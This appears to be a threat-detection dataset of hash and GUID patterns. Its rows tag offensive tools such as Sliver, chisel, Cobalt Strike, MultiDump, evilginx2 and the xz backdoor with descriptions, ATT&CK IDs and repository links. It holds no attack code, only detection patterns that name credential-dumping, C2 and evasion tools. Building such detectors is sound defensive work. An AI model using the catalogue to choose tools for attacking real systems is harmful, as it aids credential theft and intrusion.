"*8fa721d35e169cddadb3a6569755c20ce19b9336125a7e5692bd0f76ee276911*",".{0,1000}8fa721d35e169cddadb3a6569755c20ce19b9336125a7e5692bd0f76ee276911.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8fa721d35e169cddadb3a6569755c20ce19b9336125a7e5692bd0f76ee276911*",".{0,1000}8fa721d35e169cddadb3a6569755c20ce19b9336125a7e5692bd0f76ee276911.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8fc21bc6c4a11583b4db44e3dad0980bdb5c7ace*",".{0,1000}8fc21bc6c4a11583b4db44e3dad0980bdb5c7ace.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*90023e0492635199b386d05e8bffdb806f0cc6a6d0e6a2dbc9a58867d002b566*",".{0,1000}90023e0492635199b386d05e8bffdb806f0cc6a6d0e6a2dbc9a58867d002b566.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*90229D7D-5CC2-4C1E-80D3-4B7C7289B480*",".{0,1000}90229D7D\-5CC2\-4C1E\-80D3\-4B7C7289B480.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*9036e04e3c1caa4b91d008a010df98e93449cfcd1ace8922d96883bd1587764c*",".{0,1000}9036e04e3c1caa4b91d008a010df98e93449cfcd1ace8922d96883bd1587764c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9037b5197eeeb068f24a73f9ac99320e0aeed9a91a69f18eec013c689be871bb*",".{0,1000}9037b5197eeeb068f24a73f9ac99320e0aeed9a91a69f18eec013c689be871bb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*903d7db4500738baf1e30f3923909fda0df637ca2fd904a6e67565f72925f613*",".{0,1000}903d7db4500738baf1e30f3923909fda0df637ca2fd904a6e67565f72925f613.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*904b042e2ec7aa85331911b1343213292e061dcc4f2010d01f4f7b60f0198b10*",".{0,1000}904b042e2ec7aa85331911b1343213292e061dcc4f2010d01f4f7b60f0198b10.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*906397a1765b82510679cb5b0f26ef1c8c89335c68f1d17178f924e5b2544454*",".{0,1000}906397a1765b82510679cb5b0f26ef1c8c89335c68f1d17178f924e5b2544454.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*90873c2ac02c860b3b6ec7cf262ab58504ff187dd9e638bbabef94e985607836*",".{0,1000}90873c2ac02c860b3b6ec7cf262ab58504ff187dd9e638bbabef94e985607836.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*90a9080ebaafb4fcf1deb6e6810b4cfc38e0c16b6c9849969aee3a23a730db5b*",".{0,1000}90a9080ebaafb4fcf1deb6e6810b4cfc38e0c16b6c9849969aee3a23a730db5b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*90bb2613b2c711e20dce52480e998feda6e8488017e6f792b486616529cad8b2*",".{0,1000}90bb2613b2c711e20dce52480e998feda6e8488017e6f792b486616529cad8b2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*90bf7beb921839957e7977851f01e757346d2b4f672e6a08b04e57878cd6efbf*",".{0,1000}90bf7beb921839957e7977851f01e757346d2b4f672e6a08b04e57878cd6efbf.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","10","2","133","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z" "*90c08dc1a2ec6ad65002990fe43220d8974c92a02c2639562447c98bdbc04a22*",".{0,1000}90c08dc1a2ec6ad65002990fe43220d8974c92a02c2639562447c98bdbc04a22.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*90dfb88b36bbfab99ffae972aaf0d1959fd7729b11e7b5933486cd2848270fd6*",".{0,1000}90dfb88b36bbfab99ffae972aaf0d1959fd7729b11e7b5933486cd2848270fd6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*90e2d1bb612d9658067799266605dff148b292dafd4f6ddff3e184a9b7998376*",".{0,1000}90e2d1bb612d9658067799266605dff148b292dafd4f6ddff3e184a9b7998376.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*90F6244A-5EEE-4A7A-8C75-FA6A52DF34D3*",".{0,1000}90F6244A\-5EEE\-4A7A\-8C75\-FA6A52DF34D3.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","N/A","8","N/A","N/A","N/A","N/A","N/A" "*90fcf63af14fcaee770bbf4f777845b46fc81a6c38ed966bb80c7b5078d46f17*",".{0,1000}90fcf63af14fcaee770bbf4f777845b46fc81a6c38ed966bb80c7b5078d46f17.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*911be80c0cbcc8c3bc351a3e60db0d7494858603*",".{0,1000}911be80c0cbcc8c3bc351a3e60db0d7494858603.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*9120da326f6d13c492ca42da217b25a24515ca0d2f468acde8ddb5d5417c6652*",".{0,1000}9120da326f6d13c492ca42da217b25a24515ca0d2f468acde8ddb5d5417c6652.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*91302dd386709f514908c61d52d0e917ef6c4db866ee9f9f1b387ceb1e87cd7a*",".{0,1000}91302dd386709f514908c61d52d0e917ef6c4db866ee9f9f1b387ceb1e87cd7a.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*913d774e5cf0bfad4adfa900997f7a1a*",".{0,1000}913d774e5cf0bfad4adfa900997f7a1a.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*913d774e5cf0bfad4adfa900997f7a1a*",".{0,1000}913d774e5cf0bfad4adfa900997f7a1a.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*91474981006a8437b1f628985dfc79c56dac4cb73dbcbebed1c01211149aef81*",".{0,1000}91474981006a8437b1f628985dfc79c56dac4cb73dbcbebed1c01211149aef81.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*91502e94bd83b8803e91d20d1b231c112d65561f588b92e888982f7753374e8d*",".{0,1000}91502e94bd83b8803e91d20d1b231c112d65561f588b92e888982f7753374e8d.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*9183fb7b9d4dc2bae17ce77d1069811f767fe88d17944c9cb81120af0c239faf*",".{0,1000}9183fb7b9d4dc2bae17ce77d1069811f767fe88d17944c9cb81120af0c239faf.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*9188fe2a96fbb147f85f455cb4edad4f21878e269f032556da95e8d0a9889f93*",".{0,1000}9188fe2a96fbb147f85f455cb4edad4f21878e269f032556da95e8d0a9889f93.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*919282a2110d48cdca526f1638e723c84c3f3a3d85525488887b065b476b3887*",".{0,1000}919282a2110d48cdca526f1638e723c84c3f3a3d85525488887b065b476b3887.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*91ae5ce613fa82b7764401fb12fb8977a0b3c78325faa16f30abeb3dfbe9c71a*",".{0,1000}91ae5ce613fa82b7764401fb12fb8977a0b3c78325faa16f30abeb3dfbe9c71a.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","https://www.virustotal.com/gui/file/91ae5ce613fa82b7764401fb12fb8977a0b3c78325faa16f30abeb3dfbe9c71a","10","10","N/A","N/A","N/A","N/A" "*91B12706-DC6A-45DE-97F1-FAF0901FF6AF*",".{0,1000}91B12706\-DC6A\-45DE\-97F1\-FAF0901FF6AF.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*91b1c7537e69ff7ade05c1c3a6051c2981a022a11b71c6e355891e294574a066*",".{0,1000}91b1c7537e69ff7ade05c1c3a6051c2981a022a11b71c6e355891e294574a066.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*91EA50CD-E8DF-4EDF-A765-75354643BD0D*",".{0,1000}91EA50CD\-E8DF\-4EDF\-A765\-75354643BD0D.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*91ec53f564ad02117b9d7e868c449265e99b4b7443d3a83ffe55b3b49d5be279*",".{0,1000}91ec53f564ad02117b9d7e868c449265e99b4b7443d3a83ffe55b3b49d5be279.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*920021c608185f95a4100ebec9e7c0fb4c67c1d192257ba9ac3430b2939762a3*",".{0,1000}920021c608185f95a4100ebec9e7c0fb4c67c1d192257ba9ac3430b2939762a3.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","N/A","9","2","196","31","2024-04-13T13:58:04Z","2024-01-10T17:25:58Z" "*920c719a1e1d8509b4f2a46062887ad5d09cc53ef907cb3c58140a9eefe6522d*",".{0,1000}920c719a1e1d8509b4f2a46062887ad5d09cc53ef907cb3c58140a9eefe6522d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*920e37529214d87fb835861d8c539e5c70d9d98fb0f48ad097760f298aee30d3*",".{0,1000}920e37529214d87fb835861d8c539e5c70d9d98fb0f48ad097760f298aee30d3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*921157808497e5fe57f27fdb490be391f0f28bacffdb8cb9ed233bc3929b85a3*",".{0,1000}921157808497e5fe57f27fdb490be391f0f28bacffdb8cb9ed233bc3929b85a3.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*922b54e9d685b1bdd4d04f7b34c9f42b5f99745325a65f3147c719108d7e01c5*",".{0,1000}922b54e9d685b1bdd4d04f7b34c9f42b5f99745325a65f3147c719108d7e01c5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9250bff8ddad6b9cd10ef94589c2fb82e97a12772856e92af4ff26adfbc3021c*",".{0,1000}9250bff8ddad6b9cd10ef94589c2fb82e97a12772856e92af4ff26adfbc3021c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*927c3728901bdfa38cd1ec9e7ca972923b1cc51d7159e0d25e2c063e6d2a2f60*",".{0,1000}927c3728901bdfa38cd1ec9e7ca972923b1cc51d7159e0d25e2c063e6d2a2f60.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50*",".{0,1000}92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*928097a924168caad66fead2633e4d44e4f585e0d33d05deb50b9c2d34cda246*",".{0,1000}928097a924168caad66fead2633e4d44e4f585e0d33d05deb50b9c2d34cda246.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*929dbe39814a7b4acba0efe0a552840aeb1e9a5b1f8045be633e6fb68f4e2155*",".{0,1000}929dbe39814a7b4acba0efe0a552840aeb1e9a5b1f8045be633e6fb68f4e2155.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*92bc6c12e5ead3c0c0069b53bcca9c2f21b9f2e10f1e4a05ef1efcd25bcc70e9*",".{0,1000}92bc6c12e5ead3c0c0069b53bcca9c2f21b9f2e10f1e4a05ef1efcd25bcc70e9.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*92c2dcbc529e4f81c4bc9aedfabc4361314ab0799a3fa56bc14750933cf207a3*",".{0,1000}92c2dcbc529e4f81c4bc9aedfabc4361314ab0799a3fa56bc14750933cf207a3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 